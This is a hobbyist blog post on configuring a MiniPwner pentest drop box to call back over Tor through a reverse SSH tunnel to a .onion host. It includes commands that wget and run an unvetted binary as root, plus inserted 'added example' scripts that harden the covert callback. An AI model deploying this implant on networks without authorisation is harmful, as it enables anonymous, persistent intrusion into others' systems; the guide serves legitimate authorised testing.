MiniPwner – Evil Network Dropbox

The MiniPwner is a penetration testing “drop box”: a small, cheap, simple but powerful device that can be inconspicuously plugged into a network and give the penetration tester remote access to it. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the Pwnie Express plugs which run upwards of $500. At that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the MiniPwner include:

Hardware:

  • Atheros 400MHz MIPS CPU
  • 32MB RAM
  • 4MB flash
  • 10/100Mbps Ethernet interface
  • 802.11b/g/n wireless interface with one internal antenna
  • USB 2.0 port
  • Micro-USB power socket, approximately 1W power draw
  • 5.7cm x 5.7cm x 1.8cm dimensions

Bundled tools:

  • nmap: network scanner
  • tcpdump: sniffer
  • netcat: the hacker's Swiss army knife
  • aircrack: wireless network analysis
  • kismet: wireless network analysis
  • perl: Perl scripting language
  • openvpn: VPN client and server
  • dsniff: suite of sniffing and spoofing tools, including arpspoof
  • nbtscan: NetBIOS network scanner
  • snort: sniffer, packet logger, intrusion detection system
  • karma: wireless sniffing tool
  • samba2-client: Windows file sharing client
  • elinks: text-based web browser
  • yafc: FTP client
  • openssh-sftp-client: secure file transfer client

So after doing the initial install of the OpenWrt firmware and configuring the other applications, I came across an awesome article on SecurityGeneration.com which described some James Bond type shit: having your Pwnie Express connect back to you over Tor so you would essentially be untraceable. Instead of having it connect back through SSH to your IP address, you would have it connect back to a Tor *.onion address. But since I don't have a PwnPlug, the only problem that lay ahead was converting the instructions to work on this MiniPwner box. Now I'm not an expert on getting this shit configured properly, so I relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I'm not going to rehash getting the MiniPwner firmware onto the TP-Link here, so I'll pick up where his article left off. And I'm not going to rehash getting your Tor hidden service running; follow step 1 of SecurityGeneration's article if you need to figure that out.

First thing I did was get Tor installed on the USB drive (which should already be set up per the original instructions on the MiniPwner site):

opkg -dest usb install tor-geoip

then symlink it into root's home (Tor falls back to ~/.tor as its data directory when none is configured):

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the Tor config file:

vi /etc/tor/torrc

Scroll to the bottom and change "User tor" to "User root". (This runs Tor as root, which it does not need: it only needs a user that can write its data directory, so "User tor" with the data directory owned by that user works too if the tor user exists.)
Next find "DataDirectory /var/lib/tor" and change it to "DataDirectory /mnt/usb/usr/share/tor/lib", then save the config file. This moves Tor's working data (cached consensus, descriptors, keys) onto the USB drive; otherwise Tor starts writing into the MiniPwner's 4MB flash and soon fills it. You can check the file for typos with "tor --verify-config", and you should then be able to start Tor with no errors by typing "tor". Once that works you will probably want Tor to start when the MiniPwner powers up.

Add Tor to the default run level (start at boot):

cd /etc/rc.d
ln -s ../init.d/tor S99tor
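The Tor setup above (install to the USB stick, move the data directory, verify, enable at boot) as one script. This is an added example rather than the post's own commands: the paths and settings are the post's, while the helper functions set_torrc_option and get_torrc_option and the "configure" entry point are written here. set_torrc_option replaces every existing (or commented-out) line for a key so the file ends up with exactly one setting per key, and the config is parsed with tor --verify-config before it is enabled at boot.

```shell
#!/bin/sh
# Added example: the torrc edits from this post, applied and checked from a script.
# Paths are the post's; the function names are mine.
TORRC=${TORRC:-/etc/tor/torrc}
TOR_DATA=${TOR_DATA:-/mnt/usb/usr/share/tor/lib}

# set_torrc_option FILE KEY VALUE
# Drops every existing "KEY ..." line (including commented-out "#KEY ..." examples)
# and appends "KEY VALUE", so the file ends up with exactly one setting for KEY.
set_torrc_option() {
    f=$1; key=$2; val=$3; tmp="$f.tmp.$$"
    grep -v "^[# ]*$key[[:space:]]" "$f" > "$tmp" || true   # grep -v exits 1 if nothing is left
    echo "$key $val" >> "$tmp"
    mv "$tmp" "$f"
}

# get_torrc_option FILE KEY -> prints the (last) value set for KEY, empty if unset
get_torrc_option() {
    sed -n "s/^$2[[:space:]]\{1,\}//p" "$1" | tail -n 1
}

configure_tor() {
    opkg -dest usb install tor-geoip || return 1
    mkdir -p "$TOR_DATA" && chmod 700 "$TOR_DATA"    # Tor expects 0700 on its data directory
    ln -sf /mnt/usb/usr/share/tor /root/.tor
    # The post runs Tor as root. Tor only needs a user that can write TOR_DATA, so
    # "User tor" plus "chown tor $TOR_DATA" works as well if the tor user exists.
    set_torrc_option "$TORRC" User root
    set_torrc_option "$TORRC" DataDirectory "$TOR_DATA"
    # Parse the config before enabling it at boot; a typo would otherwise only show up
    # as Tor silently not running after the next power cycle.
    tor -f "$TORRC" --verify-config || return 1
    ln -sf ../init.d/tor /etc/rc.d/S99tor
}

# Run as "sh tor-setup.sh configure" on the MiniPwner.
case ${1:-} in configure) configure_tor ;; esac
```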

Now the hardest part of the instructions was getting connect.c and compiling it. By default OpenWrt doesn't ship anything to compile programs with in its repository, so it's a clusterfuck: you need to cross-compile connect.c for the MiniPwner's MIPS architecture on another box using the OpenWrt toolchain, then send it over to your MiniPwner and pray that it works. Luckily I already went through this and have a binary ::here::. I'll write more about doing this at a later time. So all you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get the OpenSSH client onto the MiniPwner (openssh-client-utils pulls in openssh-client, which provides the ssh binary at /mnt/usb/usr/bin/ssh, and also gives you ssh-keygen for generating the key used below):

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh client config file:

vi /etc/ssh/ssh_config

add these 2 lines to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

The -S flag tells connect to go through the SOCKS5 proxy on Tor's port 9050 for any host ending in .onion. If ssh fails with a name-resolution error, add -R remote before -S so connect hands the .onion name to Tor rather than trying to look it up through the local network's DNS (which can't resolve it anyway and would leak the name to whoever runs that DNS).

Then I made a simple script to automate connecting back to your Tor hidden service.
Just change blablablabla.onion to your .onion address and SSH_user to your username:

vi reversessh.sh

#!/bin/sh
Rec_Port=22                    # port the hidden service exposes sshd on
Remote_Tor=blablablabla.onion  # your hidden service address
SSH_user=anonymous             # account on the hidden service box
SSH_key="/root/.ssh/id_rsa"    # key whose public half is in that account's authorized_keys
# -N: no remote command, forward only
# -R 3330:localhost:22: expose the MiniPwner's sshd on the server's loopback port 3330
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i "$SSH_key" "$SSH_user"@"$Remote_Tor" -p "$Rec_Port"

then save and chmod it:

chmod 0755 reversessh.sh
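A sturdier version of reversessh.sh, as an added example (my rewrite, not the post's script): it refuses to start if the key, the connect binary or a pinned host key for the hidden service is missing, keeps reconnecting with exponential backoff when the Tor circuit dies, and passes the ProxyCommand inline so it does not depend on the ssh_config edit above. Paths, the .onion placeholder, user and ports are the post's; the -R remote flag for connect, the ssh options and the function names are mine.

```shell
#!/bin/sh
# reversessh.sh, reworked (added example, not the original post's script).
SSH_BIN=${SSH_BIN:-/mnt/usb/usr/bin/ssh}
CONNECT_BIN=${CONNECT_BIN:-/usr/local/bin/connect}
REMOTE_TOR=${REMOTE_TOR:-blablablabla.onion}   # your hidden service address
REC_PORT=${REC_PORT:-22}                       # port the hidden service exposes sshd on
SSH_USER=${SSH_USER:-anonymous}
SSH_KEY=${SSH_KEY:-/root/.ssh/id_rsa}
REVERSE_PORT=${REVERSE_PORT:-3330}             # loopback port on the server that reaches the MiniPwner
KNOWN_HOSTS=${KNOWN_HOSTS:-/root/.ssh/known_hosts}   # must already hold "<onion> <keytype> <hostkey>"

# backoff_delay N -> seconds to wait after N consecutive failures: 5, 10, 20, ... capped at 300.
backoff_delay() {
    n=$1; d=5
    while [ "$n" -gt 0 ] && [ "$d" -lt 300 ]; do d=$((d * 2)); n=$((n - 1)); done
    [ "$d" -gt 300 ] && d=300
    echo "$d"
}

# Refuse to run when something the callback needs is missing, instead of looping on an
# unhelpful ssh error with no one watching.
preflight() {
    for bin in "$SSH_BIN" "$CONNECT_BIN"; do
        [ -x "$bin" ] || { echo "preflight: $bin not executable" >&2; return 1; }
    done
    [ -f "$SSH_KEY" ] || { echo "preflight: key $SSH_KEY missing" >&2; return 1; }
    [ -f "$KNOWN_HOSTS" ] || { echo "preflight: $KNOWN_HOSTS missing; pin the hidden service's host key first" >&2; return 1; }
    return 0
}

# One callback attempt.
#   BatchMode: never prompt (nobody is at the console)
#   ExitOnForwardFailure: fail, and retry later, if port 3330 is already taken on the server
#   ServerAlive*: notice a dead Tor circuit within ~3 minutes instead of hanging forever
#   StrictHostKeyChecking=yes: only talk to the server whose key is pinned in KNOWN_HOSTS
#   ProxyCommand: -R remote makes connect hand the .onion name to Tor (no local DNS lookup)
attempt() {
    "$SSH_BIN" -N \
        -o BatchMode=yes \
        -o ExitOnForwardFailure=yes \
        -o ServerAliveInterval=60 \
        -o ServerAliveCountMax=3 \
        -o StrictHostKeyChecking=yes \
        -o "UserKnownHostsFile=$KNOWN_HOSTS" \
        -o "ProxyCommand=$CONNECT_BIN -R remote -S localhost:9050 %h %p" \
        -i "$SSH_KEY" -p "$REC_PORT" \
        -R "127.0.0.1:$REVERSE_PORT:localhost:22" \
        "$SSH_USER@$REMOTE_TOR"
}

callback_loop() {
    preflight || return 1
    fails=0
    while :; do
        if attempt; then fails=0; else fails=$((fails + 1)); fi
        sleep "$(backoff_delay "$fails")"
    done
}

# Start with "sh reversessh.sh run" (e.g. from /etc/rc.local, after Tor is up).
case ${1:-} in run) callback_loop ;; esac
```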

If all goes well you should be able to run

./reversessh.sh

and on your Tor hidden service box you can run watch "netstat -lntup" and should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

Since the forwarded port is bound to the server's loopback only, you connect to it from the server itself:

ssh root@localhost -p 3330

and you are connected to your MiniPwner over Tor :)

If anyone has anything to add/fix to this please hit me up: illwill at illmob.org. Thanks to |m| & inhibit for help getting this working.
